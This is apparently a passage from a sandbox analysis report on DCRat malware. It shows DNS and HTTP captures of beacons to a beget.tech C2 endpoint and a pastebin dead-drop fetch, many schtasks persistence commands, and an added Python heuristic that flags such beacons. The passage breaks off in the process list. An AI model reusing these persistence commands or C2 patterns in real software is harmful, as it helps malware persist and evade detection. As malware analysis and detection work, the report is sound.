              Jul 27, 2024 11:37:32.311815023 CEST | 192.168.2.7 | 1.1.1.1 | 0x33f9 | Standard query (0) | romangw5.beget.tech | A (IP address) | IN (0x0001) | false
              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
              Jul 27, 2024 11:37:31.235738039 CEST | 1.1.1.1 | 192.168.2.7 | 0x86ff | No error (0) | pastebin.com | | 172.67.19.24 | A (IP address) | IN (0x0001) | false
              Jul 27, 2024 11:37:31.235738039 CEST | 1.1.1.1 | 192.168.2.7 | 0x86ff | No error (0) | pastebin.com | | 104.20.3.235 | A (IP address) | IN (0x0001) | false
              Jul 27, 2024 11:37:31.235738039 CEST | 1.1.1.1 | 192.168.2.7 | 0x86ff | No error (0) | pastebin.com | | 104.20.4.235 | A (IP address) | IN (0x0001) | false
              Jul 27, 2024 11:37:32.375680923 CEST | 1.1.1.1 | 192.168.2.7 | 0x33f9 | No error (0) | romangw5.beget.tech | | 5.101.153.57 | A (IP address) | IN (0x0001) | false
              Jul 27, 2024 11:37:33.188515902 CEST | 1.1.1.1 | 192.168.2.7 | 0x1acc | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
              Jul 27, 2024 11:37:33.188515902 CEST | 1.1.1.1 | 192.168.2.7 | 0x1acc | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
              • pastebin.com
              • romangw5.beget.tech
              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              0 | 192.168.2.7 | 49706 | 5.101.153.57 | 80 | 1532 | C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe
              Timestamp | Bytes transferred | Direction | Data
              Jul 27, 2024 11:37:32.382734060 CEST | 478 | OUT | GET /L1nc0In.php?70qtQaeMHcDQCRT7QXgceCi=AOtJD6&adfdd2a97725e2297c7729eabf3b0f6c=2294d62f1ddc0f5e58e782c9a89a4ec0&69876eca3183c1643eda5600faec3e2b=QNzcDO5UjZygDZkRWYiRWMwUTZ1IjNhJDNmFTYjJWZ5MzMwEWO3kjZ&70qtQaeMHcDQCRT7QXgceCi=AOtJD6 HTTP/1.1
              Accept: */*
              Content-Type: text/css
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
              Host: romangw5.beget.tech
              Connection: Keep-Alive
              Jul 27, 2024 11:37:33.129066944 CEST | 546 | IN | HTTP/1.1 200 OK
              Server: nginx-reuseport/1.21.1
              Date: Sat, 27 Jul 2024 09:37:32 GMT
              Content-Type: text/html
              Content-Length: 274
              Last-Modified: Mon, 17 Jun 2024 09:36:19 GMT
              Connection: keep-alive
              Keep-Alive: timeout=30
              ETag: "66700393-112"
              Accept-Ranges: bytes
              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 73 65 74 5f 63 6f 6f 6b 69 65 28 29 7b 76 61 72 20 6e 6f 77 20 3d 20 6e 65 77 20 44 61 74 65 28 29 3b 76 61 72 20 74 69 6d 65 20 3d 20 6e 6f 77 2e 67 65 74 54 69 6d 65 28 29 3b 74 69 6d 65 20 2b 3d 20 31 39 33 36 30 30 30 30 20 2a 20 31 30 30 30 3b 6e 6f 77 2e 73 65 74 54 69 6d 65 28 74 69 6d 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 27 62 65 67 65 74 3d 62 65 67 65 74 6f 6b 27 2b 27 3b 20 65 78 70 69 72 65 73 3d 27 2b 6e 6f 77 2e 74 6f 47 4d 54 53 74 72 69 6e 67 28 29 2b 27 3b 20 70 61 74 68 3d 2f 27 3b 7d 73 65 74 5f 63 6f 6f 6b 69 65 28 29 3b 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
              Data Ascii: <html><head><script>function set_cookie(){var now = new Date();var time = now.getTime();time += 19360000 * 1000;now.setTime(time);document.cookie='beget=begetok'+'; expires='+now.toGMTString()+'; path=/';}set_cookie();location.reload();;</script></head><body></body></html>
              Jul 27, 2024 11:37:33.132074118 CEST | 454 | OUT | GET /L1nc0In.php?70qtQaeMHcDQCRT7QXgceCi=AOtJD6&adfdd2a97725e2297c7729eabf3b0f6c=2294d62f1ddc0f5e58e782c9a89a4ec0&69876eca3183c1643eda5600faec3e2b=QNzcDO5UjZygDZkRWYiRWMwUTZ1IjNhJDNmFTYjJWZ5MzMwEWO3kjZ&70qtQaeMHcDQCRT7QXgceCi=AOtJD6 HTTP/1.1
              Accept: */*
              Content-Type: text/css
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
              Host: romangw5.beget.tech
              Jul 27, 2024 11:37:33.359345913 CEST | 546 | IN | HTTP/1.1 200 OK
              Server: nginx-reuseport/1.21.1
              Date: Sat, 27 Jul 2024 09:37:33 GMT
              Content-Type: text/html
              Content-Length: 274
              Last-Modified: Mon, 17 Jun 2024 09:36:19 GMT
              Connection: keep-alive
              Keep-Alive: timeout=30
              ETag: "66700393-112"
              Accept-Ranges: bytes
              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 73 65 74 5f 63 6f 6f 6b 69 65 28 29 7b 76 61 72 20 6e 6f 77 20 3d 20 6e 65 77 20 44 61 74 65 28 29 3b 76 61 72 20 74 69 6d 65 20 3d 20 6e 6f 77 2e 67 65 74 54 69 6d 65 28 29 3b 74 69 6d 65 20 2b 3d 20 31 39 33 36 30 30 30 30 20 2a 20 31 30 30 30 3b 6e 6f 77 2e 73 65 74 54 69 6d 65 28 74 69 6d 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 27 62 65 67 65 74 3d 62 65 67 65 74 6f 6b 27 2b 27 3b 20 65 78 70 69 72 65 73 3d 27 2b 6e 6f 77 2e 74 6f 47 4d 54 53 74 72 69 6e 67 28 29 2b 27 3b 20 70 61 74 68 3d 2f 27 3b 7d 73 65 74 5f 63 6f 6f 6b 69 65 28 29 3b 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 29 3b 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
              Data Ascii: <html><head><script>function set_cookie(){var now = new Date();var time = now.getTime();time += 19360000 * 1000;now.setTime(time);document.cookie='beget=begetok'+'; expires='+now.toGMTString()+'; path=/';}set_cookie();location.reload();;</script></head><body></body></html>


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              0 | 192.168.2.7 | 49704 | 172.67.19.24 | 443 | 1532 | C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe
              Timestamp | Bytes transferred | Direction | Data
              2024-07-27 09:37:31 UTC | 219 | OUT | GET /raw/i8wetBiv HTTP/1.1
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
              Host: pastebin.com
              Connection: Keep-Alive
              2024-07-27 09:37:32 UTC | 388 | IN | HTTP/1.1 200 OK
              Date: Sat, 27 Jul 2024 09:37:32 GMT
              Content-Type: text/plain; charset=utf-8
              Transfer-Encoding: chunked
              Connection: close
              x-frame-options: DENY
              x-content-type-options: nosniff
              x-xss-protection: 1;mode=block
              cache-control: public, max-age=1801
              CF-Cache-Status: MISS
              Last-Modified: Sat, 27 Jul 2024 09:37:32 GMT
              Server: cloudflare
              CF-RAY: 8a9ba6be0dbb7d06-EWR
              2024-07-27 09:37:32 UTC | 412 | IN | Data Raw: 31 39 35 0d 0a 50 54 31 52 5a 6a 78 52 52 6b 42 48 66 43 70 65 4b 54 35 72 66 6a 77 73 58 6a 73 75 51 54 41 6c 62 30 35 65 49 7a 42 67 4a 43 78 73 4c 46 34 6a 50 47 42 2b 54 69 67 73 62 57 49 74 49 53 42 69 4a 69 34 6d 4a 53 6c 42 53 43 77 77 4c 57 31 66 4b 56 38 38 54 56 38 2b 4a 43 55 38 55 55 5a 41 52 33 77 71 58 69 6b 2b 61 33 34 38 4c 46 34 37 4c 6b 45 77 4a 57 39 4f 58 69 4d 77 59 43 51 73 62 43 78 65 49 7a 78 67 66 6b 34 6f 4c 47 31 69 4c 53 45 67 59 69 59 75 4a 69 55 70 51 55 67 73 4d 43 31 74 58 79 6c 66 66 6b 31 66 50 69 5a 6c 2e 3d 3d 51 66 69 67 69 49 36 49 79 4d 69 77 69 49 2b 4a 69 4f 69 4d 6c 49 73 49 43 49 69 6f 6a 49 79 49 43 4c 69 51 69 49 36 49 79 51 69 77 69 49 41 4a 69 4f 69 49 6c 49 73 49 69 4a 69 6f 6a 49 35 4a 43 4c 69 30 69 49 36
              Data Ascii: 195PT1RZjxRRkBHfCpeKT5rfjwsXjsuQTAlb05eIzBgJCxsLF4jPGB+TigsbWItISBiJi4mJSlBSCwwLW1fKV88TV8+JCU8UUZAR3wqXik+a348LF47LkEwJW9OXiMwYCQsbCxeIzxgfk4oLG1iLSEgYiYuJiUpQUgsMC1tXylffk1fPiZl.==QfigiI6IyMiwiI+JiOiMlIsICIiojIyICLiQiI6IyQiwiIAJiOiIlIsIiJiojI5JCLi0iI6
              2024-07-27 09:37:32 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
              Data Ascii: 0
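
The two HTTP sessions above show what the ET rule keyed on: a GET to a .php endpoint on romangw5.beget.tech whose parameter names are 32-hex hashes, with a Content-Type header on a request that has no body, and a raw paste fetched from pastebin.com, both issued by an executable in C:\Users\Default with a Chromium User-Agent. The following Python is an added triage example, not part of the Joe Sandbox report and not DCRat or Suricata logic: it parses captured requests and applies those observations as heuristics. BEACON and PASTE are copied from the sessions above; BENIGN is a constructed control; the rules, the thresholds and the indicator strings are the author's own.

```python
"""Heuristic triage of captured HTTP requests for DCRat-style beacons.

Added example, not part of the Joe Sandbox report. BEACON and PASTE are the
two requests the report captured from HuzhgkcqwYiFfxvhdfMUs.exe; BENIGN is
a constructed control. The rules below are the author's heuristics.
"""
import re
from urllib.parse import parse_qsl, urlsplit

HEX32 = re.compile(r"^[0-9a-f]{32}$")                 # md5-looking field names
BROWSER_UA = re.compile(r"Mozilla/5\.0 .*(Chrome|Edg|Firefox)/")
BROWSERS = ("chrome.exe", "msedge.exe", "firefox.exe")
PROFILE_ROOT_EXE = re.compile(r"^c:\\users\\[^\\]+\\[^\\]+\.exe$")


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, path, query pairs, headers, body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        key, sep, value = line.partition(":")
        if sep:
            headers[key.strip().lower()] = value.strip()
    url = urlsplit(target)
    return {"method": method, "path": url.path,
            "query": parse_qsl(url.query, keep_blank_values=True),
            "headers": headers, "body": body}


def beacon_indicators(raw: str, process_path: str) -> list[str]:
    """Return the heuristics that fire for one request issued by process_path."""
    req = parse_request(raw)
    h = req["headers"]
    names = [k for k, _ in req["query"]]
    proc = process_path.lower()
    hits = []
    # A GET carries no entity body, so Content-Type has no business on it;
    # the captured beacon sets "text/css" on its GET anyway.
    if req["method"] == "GET" and "content-type" in h and not req["body"]:
        hits.append("content-type header on bodyless GET")
    # Field names hashed to 32 hex characters instead of readable names.
    if sum(1 for k in names if HEX32.match(k)) >= 2:
        hits.append("multiple md5-like query parameter names")
    # The same parameter sent twice (first and last in the query string).
    if len(names) != len(set(names)):
        hits.append("duplicated query parameter")
    # Chromium-style User-Agent from an image that is not a browser.
    if BROWSER_UA.search(h.get("user-agent", "")) and not proc.endswith(BROWSERS):
        hits.append("browser user-agent from non-browser process")
    # Paste-site raw endpoint used as a dead-drop resolver for C2 config.
    if h.get("host", "").endswith("pastebin.com") and req["path"].startswith("/raw/"):
        hits.append("pastebin raw fetch (dead-drop resolver)")
    # Image in the root of a user profile or anywhere in the Default profile.
    if proc.startswith(("c:\\users\\default\\", "c:\\users\\default user\\")) or PROFILE_ROOT_EXE.match(proc):
        hits.append("process image in a user profile root")
    return hits


# Copied from the report's HTTP session to romangw5.beget.tech.
BEACON = "\r\n".join([
    "GET /L1nc0In.php?70qtQaeMHcDQCRT7QXgceCi=AOtJD6"
    "&adfdd2a97725e2297c7729eabf3b0f6c=2294d62f1ddc0f5e58e782c9a89a4ec0"
    "&69876eca3183c1643eda5600faec3e2b=QNzcDO5UjZygDZkRWYiRWMwUTZ1IjNhJDNmFTYjJWZ5MzMwEWO3kjZ"
    "&70qtQaeMHcDQCRT7QXgceCi=AOtJD6 HTTP/1.1",
    "Accept: */*",
    "Content-Type: text/css",
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29",
    "Host: romangw5.beget.tech",
    "Connection: Keep-Alive",
    "", "",
])
# Copied from the report's HTTP session to pastebin.com.
PASTE = "\r\n".join([
    "GET /raw/i8wetBiv HTTP/1.1",
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29",
    "Host: pastebin.com",
    "Connection: Keep-Alive",
    "", "",
])
# Constructed control: an ordinary page load from a real browser.
BENIGN = "\r\n".join([
    "GET /index.html HTTP/1.1",
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36",
    "Host: www.example.com",
    "", "",
])
DCRAT_PROC = r"C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe"      # from the report
CHROME_PROC = r"C:\Program Files\Google\Chrome\Application\chrome.exe"  # constructed

if __name__ == "__main__":
    for label, raw, proc in (("beacon", BEACON, DCRAT_PROC),
                             ("pastebin", PASTE, DCRAT_PROC),
                             ("benign", BENIGN, CHROME_PROC)):
        print(label, beacon_indicators(raw, proc))
```

Run stand-alone, the beacon request fires five of the six heuristics and the pastebin fetch three, while the constructed browser request fires none; in practice the process path comes from the proxy or EDR record that joins the flow to its image, as the Session ID table above does.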



              Target ID:0
              Start time:05:37:14
              Start date:27/07/2024
              Path:C:\Users\user\Desktop\QIKiV83Pkl.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\QIKiV83Pkl.exe"
              Imagebase:0x870000
              File size:2'777'219 bytes
              MD5 hash:2C00EBC767B339C3BAF6BCF3086EDF51
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low
              Has exited:true

              Target ID:2
              Start time:05:37:14
              Start date:27/07/2024
              Path:C:\Windows\SysWOW64\wscript.exe
              Wow64 process (32bit):true
              Commandline:"C:\Windows\System32\WScript.exe" "C:\brokermonitordhcp\NKrhHlHeQ28n8tUMpitEGWra.vbe"
              Imagebase:0x4f0000
              File size:147'456 bytes
              MD5 hash:FF00E0480075B095948000BDC66E81F0
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:moderate
              Has exited:true

              Target ID:3
              Start time:05:37:25
              Start date:27/07/2024
              Path:C:\Windows\SysWOW64\cmd.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\system32\cmd.exe /c ""C:\brokermonitordhcp\2sqRykCed6LZLP.bat" "
              Imagebase:0x410000
              File size:236'544 bytes
              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:4
              Start time:05:37:25
              Start date:27/07/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff75da10000
              File size:862'208 bytes
              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:5
              Start time:05:37:25
              Start date:27/07/2024
              Path:C:\brokermonitordhcp\portruntime.exe
              Wow64 process (32bit):false
              Commandline:"C:\brokermonitordhcp\portruntime.exe"
              Imagebase:0x570000
              File size:2'392'064 bytes
              MD5 hash:DE91A616A55A97BB434BC118AF3E0E7B
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.1474905892.0000000002FEC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.1474905892.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.1476467442.0000000012CDF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              Antivirus matches:
              • Detection: 100%, Avira
              • Detection: 100%, Joe Sandbox ML
              • Detection: 88%, ReversingLabs
              • Detection: 68%, Virustotal, Browse
              Reputation:low
              Has exited:true

              Target ID:6
              Start time:05:37:26
              Start date:27/07/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Users\Default\conhost.exe'" /f
              Imagebase:0x7ff795bf0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:7
              Start time:05:37:26
              Start date:27/07/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Default\conhost.exe'" /rl HIGHEST /f
              Imagebase:0x7ff795bf0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:8
              Start time:05:37:26
              Start date:27/07/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Users\Default\conhost.exe'" /rl HIGHEST /f
              Imagebase:0x7ff795bf0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:9
              Start time:05:37:26
              Start date:27/07/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe'" /f
              Imagebase:0x7ff795bf0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:10
              Start time:05:37:27
              Start date:27/07/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUs" /sc ONLOGON /tr "'C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
              Imagebase:0x7ff795bf0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:11
              Start time:05:37:27
              Start date:27/07/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Photo Viewer\en-GB\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
              Imagebase:0x7ff795bf0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:12
              Start time:05:37:27
              Start date:27/07/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 11 /tr "'C:\Users\jones\HuzhgkcqwYiFfxvhdfMUs.exe'" /f
              Imagebase:0x7ff795bf0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:13
              Start time:05:37:27
              Start date:27/07/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUs" /sc ONLOGON /tr "'C:\Users\jones\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
              Imagebase:0x7ff795bf0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:14
              Start time:05:37:27
              Start date:27/07/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 10 /tr "'C:\Users\jones\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
              Imagebase:0x7ff795bf0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:16
              Start time:05:37:27
              Start date:27/07/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\HuzhgkcqwYiFfxvhdfMUs.exe'" /f
              Imagebase:0x7ff795bf0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:18
              Start time:05:37:27
              Start date:27/07/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUs" /sc ONLOGON /tr "'C:\Users\Default User\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
              Imagebase:0x7ff795bf0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:19
              Start time:05:37:27
              Start date:27/07/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
              Imagebase:0x7ff795bf0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:20
              Start time:05:37:27
              Start date:27/07/2024
              Path:C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe
              Wow64 process (32bit):false
              Commandline:"C:\Users\Default User\HuzhgkcqwYiFfxvhdfMUs.exe"
              Imagebase:0xf50000
              File size:2'392'064 bytes
              MD5 hash:DE91A616A55A97BB434BC118AF3E0E7B
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000014.00000002.1564725393.000000000356D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000014.00000002.1564725393.0000000003531000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              Antivirus matches:
              • Detection: 88%, ReversingLabs
              • Detection: 68%, Virustotal, Browse
              Has exited:true

              Target ID:21
              Start time:05:37:27
              Start date:27/07/2024
              Path:C:\Users\Default\HuzhgkcqwYiFfxvhdfMUs.exe
              Wow64 process (32bit):false
              Commandline:"C:\Users\Default User\HuzhgkcqwYiFfxvhdfMUs.exe"
              Imagebase:0x6e0000
              File size:2'392'064 bytes
              MD5 hash:DE91A616A55A97BB434BC118AF3E0E7B
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000015.00000002.1515032727.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              Has exited:true

              Target ID:22
              Start time:05:37:27
              Start date:27/07/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 5 /tr "'C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe'" /f
              Imagebase:0x7ff795bf0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:23
              Start time:05:37:27
              Start date:27/07/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUs" /sc ONLOGON /tr "'C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
              Imagebase:0x7ff795bf0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:24
              Start time:05:37:27
              Start date:27/07/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 9 /tr "'C:\brokermonitordhcp\HuzhgkcqwYiFfxvhdfMUs.exe'" /rl HIGHEST /f
              Imagebase:0x7ff795bf0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:25
              Start time:05:37:27
              Start date:27/07/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 13 /tr "'C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe'" /f
              Imagebase:0x7ff795bf0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:26
              Start time:05:37:27
              Start date:27/07/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe'" /rl HIGHEST /f
              Imagebase:0x7ff795bf0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:27
              Start time:05:37:27
              Start date:27/07/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Program Files\Adobe\Acrobat DC\Acrobat\winlogon.exe'" /rl HIGHEST /f
              Imagebase:0x7ff795bf0000
              File size:235'008 bytes
              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Has exited:true

              Target ID:28
              Start time:05:37:28
              Start date:27/07/2024
              Path:C:\Windows\System32\schtasks.exe
              Wow64 process (32bit):false
              Commandline:schtasks.exe /create /tn "HuzhgkcqwYiFfxvhdfMUsH" /sc MINUTE /mo 10 /tr "'C:\Windows\Downloaded Program Files\HuzhgkcqwYiFfxvhdfMUs.exe'" /f
